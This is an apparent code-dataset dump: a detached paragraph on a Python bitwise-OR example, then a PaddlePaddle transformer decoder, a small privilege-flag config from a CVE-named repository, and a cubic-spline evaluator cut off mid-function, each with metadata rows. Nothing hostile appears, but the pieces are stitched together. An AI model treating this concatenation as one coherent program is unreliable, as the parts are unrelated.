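The one-line test above uses the Python 2 `print` statement, which Skulpt supports. The expression is a chain of bitwise ORs; a Python 3 sketch of the same computation (the comment spells out the bit arithmetic):

```python
# Bitwise OR is associative: 1|2|3|4|5|6 sets the low three bits
# (0b111 == 7), and 0x80 contributes bit 7, so the whole chain
# evaluates to 0b10000111 == 135.
result = 1 | 2 | 3 | 4 | 5 | 6 | 0x80
print(result)  # 135
```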
c64b912f384b65e5a3513c95dcb95be9abddab30 | 14,999 | py | Python | NLP/EMNLP2021-SgSum/src/models/decoder.py | zhangyimi/Research | 866f91d9774a38d205d6e9a3b1ee6293748261b3 | [
"Apache-2.0"
] | 1,319 | 2020-02-14T10:42:07.000Z | 2022-03-31T15:42:18.000Z | NLP/EMNLP2021-SgSum/src/models/decoder.py | green9989/Research | 94519a72e7936c77f62a31709634b72c09aabf74 | [
"Apache-2.0"
] | 192 | 2020-02-14T02:53:34.000Z | 2022-03-31T02:25:48.000Z | NLP/EMNLP2021-SgSum/src/models/decoder.py | green9989/Research | 94519a72e7936c77f62a31709634b72c09aabf74 | [
"Apache-2.0"
] | 720 | 2020-02-14T02:12:38.000Z | 2022-03-31T12:21:15.000Z | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Transformer decoder."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from models.attention import multi_head_attention, multi_head_hierarchical_attention
from models.neural_modules import positionwise_feed_forward, \
pre_process_layer, post_process_layer
def transformer_decoder_layer(dec_input,
enc_output,
slf_attn_bias,
dec_enc_attn_bias,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd,
postprocess_cmd,
cache=None,
gather_idx=None,
param_initializer=None,
name=''):
"""
The layer to be stacked in decoder part.
:param dec_input: (batch_size, tgt_len, emb_dim)
:param enc_output: (batch_size, n_tokens, emb_dim)
:param slf_attn_bias: (batch_size, n_head, tgt_len, tgt_len)
:param dec_enc_attn_bias: (batch_size, n_head, tgt_len, n_tokens)
"""
# (batch_size, tgt_len, emb_dim)
slf_attn_output = multi_head_attention(
queries=pre_process_layer(out=dec_input, # add layer normalization
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_pre_slf_attn'),
keys=None,
values=None,
attn_bias=slf_attn_bias, # (batch_size, n_head, tgt_len, tgt_len)
d_key=d_key,
d_value=d_value,
d_model=d_model,
n_head=n_head,
dropout_rate=attention_dropout,
cache=cache,
gather_idx=gather_idx,
param_initializer=param_initializer,
name=name + '_slf_attn')
# add dropout and residual connection
# (batch_size, tgt_len, emb_dim)
slf_attn_output = post_process_layer(
prev_out=dec_input,
out=slf_attn_output,
process_cmd=postprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post_slf_attn')
# (batch_size, tgt_len, emb_dim)
context_attn_output = multi_head_attention(
queries=pre_process_layer(out=slf_attn_output, # add layer normalization
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_pre_context_attn'),
keys=enc_output, # (batch_size, n_tokens, emb_dim)
values=enc_output, # (batch_size, n_tokens, emb_dim)
attn_bias=dec_enc_attn_bias, # (batch_size, n_head, tgt_len, n_tokens)
d_key=d_key,
d_value=d_value,
d_model=d_model,
n_head=n_head,
dropout_rate=attention_dropout,
cache=cache,
gather_idx=gather_idx,
static_kv=True,
param_initializer=param_initializer,
name=name + '_context_attn')
# add dropout and residual connection
context_attn_output = post_process_layer(
prev_out=slf_attn_output,
out=context_attn_output,
process_cmd=postprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post_context_attn')
ffd_output = positionwise_feed_forward(
x=pre_process_layer(out=context_attn_output, # add layer normalization
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_pre_ffn'),
d_inner_hid=d_inner_hid,
d_hid=d_model,
dropout_rate=relu_dropout,
hidden_act=hidden_act,
param_initializer=param_initializer,
name=name + '_ffn')
# add dropout and residual connection
dec_output = post_process_layer(
prev_out=context_attn_output,
out=ffd_output,
process_cmd=postprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post_ffn')
return dec_output # (batch_size, tgt_len, emb_dim)
def transformer_decoder(dec_input,
enc_output,
dec_slf_attn_bias,
dec_enc_attn_bias,
n_layer,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd,
postprocess_cmd,
caches=None,
gather_idx=None,
param_initializer=None,
name='transformer_decoder'):
"""
The decoder is composed of a stack of identical decoder_layer layers.
:param dec_input: (batch_size, tgt_len, emb_dim)
:param enc_output: (batch_size, n_tokens, emb_dim)
:param dec_slf_attn_bias: (batch_size, n_head, tgt_len, tgt_len)
:param dec_enc_attn_bias: (batch_size, n_head, tgt_len, n_tokens)
"""
for i in range(n_layer):
# (batch_size, tgt_len, emb_dim)
dec_output = transformer_decoder_layer(
dec_input=dec_input,
enc_output=enc_output,
slf_attn_bias=dec_slf_attn_bias,
dec_enc_attn_bias=dec_enc_attn_bias,
n_head=n_head,
d_key=d_key,
d_value=d_value,
d_model=d_model,
d_inner_hid=d_inner_hid,
prepostprocess_dropout=prepostprocess_dropout,
attention_dropout=attention_dropout,
relu_dropout=relu_dropout,
hidden_act=hidden_act,
preprocess_cmd=preprocess_cmd,
postprocess_cmd=postprocess_cmd,
cache=None if caches is None else caches[i],
gather_idx=gather_idx,
param_initializer=param_initializer,
name=name + '_layer_' + str(i))
dec_input = dec_output
# add layer normalization
dec_output = pre_process_layer(out=dec_output,
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post')
return dec_output # (batch_size, tgt_len, emb_dim)
def graph_decoder_layer(dec_input,
enc_words_output,
enc_sents_output,
slf_attn_bias,
dec_enc_words_attn_bias,
dec_enc_sents_attn_bias,
graph_attn_bias,
pos_win,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd,
postprocess_cmd,
cache=None,
gather_idx=None,
param_initializer=None,
name=''):
"""
The layer to be stacked in decoder part.
:param dec_input: (batch_size, tgt_len, emb_dim)
:param enc_words_output: (batch_size, n_blocks, n_tokens, emb_dim)
:param enc_sents_output: (batch_size, n_blocks, emb_dim)
:param slf_attn_bias: (batch_size, n_head, tgt_len, tgt_len)
:param dec_enc_words_attn_bias: (batch_size, n_blocks, n_head, tgt_len, n_tokens)
:param dec_enc_sents_attn_bias: (batch_size, n_head, tgt_len, n_blocks)
:param graph_attn_bias: (batch_size, n_head, n_blocks, n_blocks)
"""
# (batch_size, tgt_len, emb_dim)
slf_attn_output = multi_head_attention(
queries=pre_process_layer(out=dec_input, # add layer normalization
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_pre_attn'),
keys=None,
values=None,
attn_bias=slf_attn_bias, # (batch_size, n_head, tgt_len, tgt_len)
d_key=d_key,
d_value=d_value,
d_model=d_model,
n_head=n_head,
dropout_rate=attention_dropout,
cache=cache,
gather_idx=gather_idx,
name=name + '_attn')
# add dropout and residual connection
# (batch_size, tgt_len, emb_dim)
slf_attn_output = post_process_layer(
prev_out=dec_input,
out=slf_attn_output,
process_cmd=postprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post_attn'
)
# (batch_size, tgt_len, emb_dim)
hier_attn_output = multi_head_hierarchical_attention(
queries=pre_process_layer(out=slf_attn_output, # add layer normalization
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_pre_hier_attn'),
keys_w=enc_words_output, # (batch_size, n_blocks, n_tokens, emb_dim)
values_w=enc_words_output, # (batch_size, n_blocks, n_tokens, emb_dim)
attn_bias_w=dec_enc_words_attn_bias, # (batch_size, n_blocks, n_head, tgt_len, n_tokens)
keys_s=enc_sents_output, # (batch_size, n_blocks, emb_dim)
values_s=enc_sents_output, # (batch_size, n_blocks, emb_dim)
attn_bias_s=dec_enc_sents_attn_bias, # (batch_size, n_head, tgt_len, n_blocks)
graph_attn_bias=graph_attn_bias, # (batch_size, n_head, n_blocks, n_blocks)
pos_win=pos_win,
d_key=d_key,
d_value=d_value,
d_model=d_model,
n_head=n_head,
dropout_rate=attention_dropout,
cache=cache,
gather_idx=gather_idx,
name=name + '_hier_attn')
# add dropout and residual connection
hier_attn_output = post_process_layer(
prev_out=slf_attn_output,
out=hier_attn_output,
process_cmd=postprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post_hier_attn')
ffd_output = positionwise_feed_forward(
x=pre_process_layer(out=hier_attn_output, # add layer normalization
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_pre_ffn'),
d_inner_hid=d_inner_hid,
d_hid=d_model,
dropout_rate=relu_dropout,
hidden_act=hidden_act,
param_initializer=param_initializer,
name=name + '_ffn'
)
# add dropout and residual connection
dec_output = post_process_layer(
prev_out=hier_attn_output,
out=ffd_output,
process_cmd=postprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post_ffn'
)
return dec_output # (batch_size, tgt_len, emb_dim)
def graph_decoder(dec_input,
enc_words_output,
enc_sents_output,
dec_slf_attn_bias,
dec_enc_words_attn_bias,
dec_enc_sents_attn_bias,
graph_attn_bias,
pos_win,
n_layer,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd,
postprocess_cmd,
caches=None,
gather_idx=None,
param_initializer=None,
name='graph_decoder'):
"""
The decoder is composed of a stack of identical decoder_layer layers.
:param dec_input: (batch_size, tgt_len, emb_dim)
:param enc_words_output: (batch_size, n_blocks, n_tokens, emb_dim)
:param enc_sents_output: (batch_size, n_blocks, emb_dim)
:param dec_slf_attn_bias: (batch_size, n_head, tgt_len, tgt_len)
:param dec_enc_words_attn_bias: (batch_size, n_blocks, n_head, tgt_len, n_tokens)
:param dec_enc_sents_attn_bias: (batch_size, n_head, tgt_len, n_blocks)
:param graph_attn_bias: (batch_size, n_head, n_blocks, n_blocks)
:return:
"""
for i in range(n_layer):
# (batch_size, tgt_len, emb_dim)
dec_output = graph_decoder_layer(
dec_input=dec_input,
enc_words_output=enc_words_output,
enc_sents_output=enc_sents_output,
slf_attn_bias=dec_slf_attn_bias,
dec_enc_words_attn_bias=dec_enc_words_attn_bias,
dec_enc_sents_attn_bias=dec_enc_sents_attn_bias,
graph_attn_bias=graph_attn_bias,
pos_win=pos_win,
n_head=n_head,
d_key=d_key,
d_value=d_value,
d_model=d_model,
d_inner_hid=d_inner_hid,
prepostprocess_dropout=prepostprocess_dropout,
attention_dropout=attention_dropout,
relu_dropout=relu_dropout,
hidden_act=hidden_act,
preprocess_cmd=preprocess_cmd,
postprocess_cmd=postprocess_cmd,
cache=None if caches is None else caches[i],
gather_idx=gather_idx,
param_initializer=param_initializer,
name=name + '_layer_' + str(i)
)
dec_input = dec_output
# add layer normalization
dec_output = pre_process_layer(out=dec_output,
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post')
return dec_output # (batch_size, tgt_len, emb_dim)
| 39.575198 | 97 | 0.581505 | 1,739 | 14,999 | 4.553191 | 0.096032 | 0.048497 | 0.037888 | 0.038646 | 0.87661 | 0.868527 | 0.845289 | 0.827987 | 0.799823 | 0.799823 | 0 | 0.000826 | 0.35429 | 14,999 | 378 | 98 | 39.679894 | 0.816727 | 0.231282 | 0 | 0.783217 | 0 | 0 | 0.021639 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013986 | false | 0 | 0.017483 | 0 | 0.045455 | 0.003497 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
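The docstrings in the decoder module above describe `slf_attn_bias` as a `(batch_size, n_head, tgt_len, tgt_len)` tensor. The sketch below is a NumPy illustration, not taken from the Paddle code: it shows the conventional way a causal self-attention bias of that shape is built (the `-1e9` fill value is an assumption, chosen as the customary large negative number added before softmax):

```python
import numpy as np

def causal_attn_bias(batch_size, n_head, tgt_len, neg_inf=-1e9):
    """Build a (batch_size, n_head, tgt_len, tgt_len) bias that is 0 on and
    below the diagonal and a large negative value above it, so softmax
    assigns ~0 weight to future target positions."""
    # np.triu with k=1 marks strictly-upper-triangular (future) positions.
    mask = np.triu(np.ones((tgt_len, tgt_len)), k=1)
    bias = mask * neg_inf  # 0 where attention is allowed
    # Broadcast the shared (tgt_len, tgt_len) mask over batch and heads.
    return np.broadcast_to(bias, (batch_size, n_head, tgt_len, tgt_len))

bias = causal_attn_bias(2, 8, 5)
```

Adding this bias to the raw attention logits before softmax is what lets `multi_head_attention` above enforce the autoregressive property without any control flow inside the kernel.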
d681e16fa043febb2664da5bc4d136cdc62cc71f | 183 | py | Python | config.py | cclauss/CVE-2019-1040 | 31da973754862bd5e5355e9a8f696d9c59f046b2 | [
"MIT"
] | 1 | 2019-06-14T16:16:12.000Z | 2019-06-14T16:16:12.000Z | config.py | x7iaob/CVE-2019-1040 | 31da973754862bd5e5355e9a8f696d9c59f046b2 | [
"MIT"
] | null | null | null | config.py | x7iaob/CVE-2019-1040 | 31da973754862bd5e5355e9a8f696d9c59f046b2 | [
"MIT"
] | 1 | 2019-10-15T08:12:04.000Z | 2019-10-15T08:12:04.000Z | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
class global_var:
    getpriv = False


def set_priv(status):
    global_var.getpriv = status


def get_priv():
    return global_var.getpriv
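The module above is just a process-wide boolean flag stored as a class attribute. A minimal, self-contained usage sketch (the class and accessors are restated here so the snippet runs on its own):

```python
class global_var:
    getpriv = False


def set_priv(status):
    global_var.getpriv = status


def get_priv():
    return global_var.getpriv


# The flag defaults to False and is shared by every caller in the process.
assert get_priv() is False
set_priv(True)
assert get_priv() is True
```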
# flare/mgp/cubic_splines_numba.py from aaronchen0316/flare (MIT license)
from numba import njit
import numpy as np
from numpy import zeros, array
from math import floor
_Ad = array(
[
# t^3 t^2 t 1
[-1.0 / 6.0, 3.0 / 6.0, -3.0 / 6.0, 1.0 / 6.0],
[3.0 / 6.0, -6.0 / 6.0, 0.0 / 6.0, 4.0 / 6.0],
[-3.0 / 6.0, 3.0 / 6.0, 3.0 / 6.0, 1.0 / 6.0],
[1.0 / 6.0, 0.0 / 6.0, 0.0 / 6.0, 0.0 / 6.0],
]
)
_dAd = array(
[
[0.0, -0.5, 1.0, -0.5],
[0.0, 1.5, -2.0, 0.0],
[0.0, -1.5, 1.0, 0.5],
[0.0, 0.5, 0.0, 0.0],
]
)
_d2Ad = array(
[
[0.0, 0.0, -1.0, 1.0],
[0.0, 0.0, 3.0, -2.0],
[0.0, 0.0, -3.0, 1.0],
[0.0, 0.0, 1.0, 0.0],
]
)
# The dAd and d2Ad are computed from the code below
# _dAd = zeros((4, 4), dtype=np.double)
# for i in range(1, 4):
# Ad_i = _Ad[:, i - 1]
# _dAd[:, i] = (4 - i) * Ad_i
#
# _d2Ad = zeros((4, 4), dtype=np.double)
# for i in range(1, 4):
# dAd_i = _dAd[:, i - 1]
# _d2Ad[:, i] = (4 - i) * dAd_i
@njit(cache=True)
def vec_eval_cubic_spline_1(a, b, orders, coefs, points, out):
d = a.shape[0]
N = points.shape[0]
for n in range(N):
x0 = points[n, 0]
M0 = orders[0]
start0 = a[0]
dinv0 = (orders[0] - 1.0) / (b[0] - a[0])
u0 = (x0 - start0) * dinv0
i0 = int(floor(u0))
i0 = max(min(i0, M0 - 2), 0)
t0 = u0 - i0
tp0_0 = t0 * t0 * t0
tp0_1 = t0 * t0
tp0_2 = t0
tp0_3 = 1.0
Phi0_0 = 0
Phi0_1 = 0
Phi0_2 = 0
Phi0_3 = 0
if t0 < 0:
Phi0_0 = _dAd[0, 3] * t0 + _Ad[0, 3]
Phi0_1 = _dAd[1, 3] * t0 + _Ad[1, 3]
Phi0_2 = _dAd[2, 3] * t0 + _Ad[2, 3]
Phi0_3 = _dAd[3, 3] * t0 + _Ad[3, 3]
elif t0 > 1:
Phi0_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t0 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi0_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t0 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi0_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t0 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
Phi0_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t0 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi0_0 = (
_Ad[0, 0] * tp0_0
+ _Ad[0, 1] * tp0_1
+ _Ad[0, 2] * tp0_2
+ _Ad[0, 3] * tp0_3
)
Phi0_1 = (
_Ad[1, 0] * tp0_0
+ _Ad[1, 1] * tp0_1
+ _Ad[1, 2] * tp0_2
+ _Ad[1, 3] * tp0_3
)
Phi0_2 = (
_Ad[2, 0] * tp0_0
+ _Ad[2, 1] * tp0_1
+ _Ad[2, 2] * tp0_2
+ _Ad[2, 3] * tp0_3
)
Phi0_3 = (
_Ad[3, 0] * tp0_0
+ _Ad[3, 1] * tp0_1
+ _Ad[3, 2] * tp0_2
+ _Ad[3, 3] * tp0_3
)
out[n] = (
Phi0_0 * (coefs[i0 + 0])
+ Phi0_1 * (coefs[i0 + 1])
+ Phi0_2 * (coefs[i0 + 2])
+ Phi0_3 * (coefs[i0 + 3])
)
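For reference, here is a pure-NumPy restatement of what the 1-D kernel above computes for a single in-range point (no numba, and the out-of-range clamping branches are omitted). One easy correctness check: with all spline coefficients equal to 1, the evaluation returns 1 everywhere, because the four basis weights are a partition of unity. The helper name `eval_spline_1d` is introduced here for illustration only.

```python
import numpy as np
from math import floor

_Ad = np.array(
    [
        [-1.0 / 6.0, 3.0 / 6.0, -3.0 / 6.0, 1.0 / 6.0],
        [3.0 / 6.0, -6.0 / 6.0, 0.0 / 6.0, 4.0 / 6.0],
        [-3.0 / 6.0, 3.0 / 6.0, 3.0 / 6.0, 1.0 / 6.0],
        [1.0 / 6.0, 0.0 / 6.0, 0.0 / 6.0, 0.0 / 6.0],
    ]
)


def eval_spline_1d(a, b, M, coefs, x):
    """Non-numba reference for one point of the 1-D kernel (in-range case)."""
    dinv = (M - 1.0) / (b - a)          # inverse grid spacing
    u = (x - a) * dinv                  # position in grid units
    i = max(min(int(floor(u)), M - 2), 0)  # left cell index, clamped
    t = u - i                           # fractional offset in the cell
    tp = np.array([t**3, t**2, t, 1.0])
    Phi = _Ad @ tp                      # four cubic B-spline weights
    return Phi @ coefs[i : i + 4]


M = 10
coefs = np.ones(M + 2)                  # M + 2 coefficients pad the 4-wide stencil
val = eval_spline_1d(0.0, 1.0, M, coefs, 0.37)
assert abs(val - 1.0) < 1e-12
```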
@njit(cache=True)
def vec_eval_cubic_spline_2(a, b, orders, coefs, points, out):
d = a.shape[0]
N = points.shape[0]
for n in range(N):
x0 = points[n, 0]
x1 = points[n, 1]
M0 = orders[0]
start0 = a[0]
dinv0 = (orders[0] - 1.0) / (b[0] - a[0])
M1 = orders[1]
start1 = a[1]
dinv1 = (orders[1] - 1.0) / (b[1] - a[1])
u0 = (x0 - start0) * dinv0
i0 = int(floor(u0))
i0 = max(min(i0, M0 - 2), 0)
t0 = u0 - i0
u1 = (x1 - start1) * dinv1
i1 = int(floor(u1))
i1 = max(min(i1, M1 - 2), 0)
t1 = u1 - i1
tp0_0 = t0 * t0 * t0
tp0_1 = t0 * t0
tp0_2 = t0
tp0_3 = 1.0
tp1_0 = t1 * t1 * t1
tp1_1 = t1 * t1
tp1_2 = t1
tp1_3 = 1.0
Phi0_0 = 0
Phi0_1 = 0
Phi0_2 = 0
Phi0_3 = 0
if t0 < 0:
Phi0_0 = _dAd[0, 3] * t0 + _Ad[0, 3]
Phi0_1 = _dAd[1, 3] * t0 + _Ad[1, 3]
Phi0_2 = _dAd[2, 3] * t0 + _Ad[2, 3]
Phi0_3 = _dAd[3, 3] * t0 + _Ad[3, 3]
elif t0 > 1:
Phi0_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t0 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi0_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t0 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi0_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t0 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
Phi0_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t0 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi0_0 = (
_Ad[0, 0] * tp0_0
+ _Ad[0, 1] * tp0_1
+ _Ad[0, 2] * tp0_2
+ _Ad[0, 3] * tp0_3
)
Phi0_1 = (
_Ad[1, 0] * tp0_0
+ _Ad[1, 1] * tp0_1
+ _Ad[1, 2] * tp0_2
+ _Ad[1, 3] * tp0_3
)
Phi0_2 = (
_Ad[2, 0] * tp0_0
+ _Ad[2, 1] * tp0_1
+ _Ad[2, 2] * tp0_2
+ _Ad[2, 3] * tp0_3
)
Phi0_3 = (
_Ad[3, 0] * tp0_0
+ _Ad[3, 1] * tp0_1
+ _Ad[3, 2] * tp0_2
+ _Ad[3, 3] * tp0_3
)
Phi1_0 = 0
Phi1_1 = 0
Phi1_2 = 0
Phi1_3 = 0
if t1 < 0:
Phi1_0 = _dAd[0, 3] * t1 + _Ad[0, 3]
Phi1_1 = _dAd[1, 3] * t1 + _Ad[1, 3]
Phi1_2 = _dAd[2, 3] * t1 + _Ad[2, 3]
Phi1_3 = _dAd[3, 3] * t1 + _Ad[3, 3]
elif t1 > 1:
Phi1_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t1 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi1_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t1 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi1_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t1 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
Phi1_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t1 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi1_0 = (
_Ad[0, 0] * tp1_0
+ _Ad[0, 1] * tp1_1
+ _Ad[0, 2] * tp1_2
+ _Ad[0, 3] * tp1_3
)
Phi1_1 = (
_Ad[1, 0] * tp1_0
+ _Ad[1, 1] * tp1_1
+ _Ad[1, 2] * tp1_2
+ _Ad[1, 3] * tp1_3
)
Phi1_2 = (
_Ad[2, 0] * tp1_0
+ _Ad[2, 1] * tp1_1
+ _Ad[2, 2] * tp1_2
+ _Ad[2, 3] * tp1_3
)
Phi1_3 = (
_Ad[3, 0] * tp1_0
+ _Ad[3, 1] * tp1_1
+ _Ad[3, 2] * tp1_2
+ _Ad[3, 3] * tp1_3
)
out[n] = (
Phi0_0
* (
Phi1_0 * (coefs[i0 + 0, i1 + 0])
+ Phi1_1 * (coefs[i0 + 0, i1 + 1])
+ Phi1_2 * (coefs[i0 + 0, i1 + 2])
+ Phi1_3 * (coefs[i0 + 0, i1 + 3])
)
+ Phi0_1
* (
Phi1_0 * (coefs[i0 + 1, i1 + 0])
+ Phi1_1 * (coefs[i0 + 1, i1 + 1])
+ Phi1_2 * (coefs[i0 + 1, i1 + 2])
+ Phi1_3 * (coefs[i0 + 1, i1 + 3])
)
+ Phi0_2
* (
Phi1_0 * (coefs[i0 + 2, i1 + 0])
+ Phi1_1 * (coefs[i0 + 2, i1 + 1])
+ Phi1_2 * (coefs[i0 + 2, i1 + 2])
+ Phi1_3 * (coefs[i0 + 2, i1 + 3])
)
+ Phi0_3
* (
Phi1_0 * (coefs[i0 + 3, i1 + 0])
+ Phi1_1 * (coefs[i0 + 3, i1 + 1])
+ Phi1_2 * (coefs[i0 + 3, i1 + 2])
+ Phi1_3 * (coefs[i0 + 3, i1 + 3])
)
)
@njit(cache=True)
def vec_eval_cubic_spline_3(a, b, orders, coefs, points, out):
d = a.shape[0]
N = points.shape[0]
for n in range(N):
x0 = points[n, 0]
x1 = points[n, 1]
x2 = points[n, 2]
M0 = orders[0]
start0 = a[0]
dinv0 = (orders[0] - 1.0) / (b[0] - a[0])
M1 = orders[1]
start1 = a[1]
dinv1 = (orders[1] - 1.0) / (b[1] - a[1])
M2 = orders[2]
start2 = a[2]
dinv2 = (orders[2] - 1.0) / (b[2] - a[2])
u0 = (x0 - start0) * dinv0
i0 = int(floor(u0))
i0 = max(min(i0, M0 - 2), 0)
t0 = u0 - i0
u1 = (x1 - start1) * dinv1
i1 = int(floor(u1))
i1 = max(min(i1, M1 - 2), 0)
t1 = u1 - i1
u2 = (x2 - start2) * dinv2
i2 = int(floor(u2))
i2 = max(min(i2, M2 - 2), 0)
t2 = u2 - i2
tp0_0 = t0 * t0 * t0
tp0_1 = t0 * t0
tp0_2 = t0
tp0_3 = 1.0
tp1_0 = t1 * t1 * t1
tp1_1 = t1 * t1
tp1_2 = t1
tp1_3 = 1.0
tp2_0 = t2 * t2 * t2
tp2_1 = t2 * t2
tp2_2 = t2
tp2_3 = 1.0
Phi0_0 = 0
Phi0_1 = 0
Phi0_2 = 0
Phi0_3 = 0
if t0 < 0:
Phi0_0 = _dAd[0, 3] * t0 + _Ad[0, 3]
Phi0_1 = _dAd[1, 3] * t0 + _Ad[1, 3]
Phi0_2 = _dAd[2, 3] * t0 + _Ad[2, 3]
Phi0_3 = _dAd[3, 3] * t0 + _Ad[3, 3]
elif t0 > 1:
Phi0_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t0 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi0_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t0 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi0_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t0 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
Phi0_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t0 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi0_0 = (
_Ad[0, 0] * tp0_0
+ _Ad[0, 1] * tp0_1
+ _Ad[0, 2] * tp0_2
+ _Ad[0, 3] * tp0_3
)
Phi0_1 = (
_Ad[1, 0] * tp0_0
+ _Ad[1, 1] * tp0_1
+ _Ad[1, 2] * tp0_2
+ _Ad[1, 3] * tp0_3
)
Phi0_2 = (
_Ad[2, 0] * tp0_0
+ _Ad[2, 1] * tp0_1
+ _Ad[2, 2] * tp0_2
+ _Ad[2, 3] * tp0_3
)
Phi0_3 = (
_Ad[3, 0] * tp0_0
+ _Ad[3, 1] * tp0_1
+ _Ad[3, 2] * tp0_2
+ _Ad[3, 3] * tp0_3
)
Phi1_0 = 0
Phi1_1 = 0
Phi1_2 = 0
Phi1_3 = 0
if t1 < 0:
Phi1_0 = _dAd[0, 3] * t1 + _Ad[0, 3]
Phi1_1 = _dAd[1, 3] * t1 + _Ad[1, 3]
Phi1_2 = _dAd[2, 3] * t1 + _Ad[2, 3]
Phi1_3 = _dAd[3, 3] * t1 + _Ad[3, 3]
elif t1 > 1:
Phi1_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t1 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi1_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t1 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi1_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t1 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
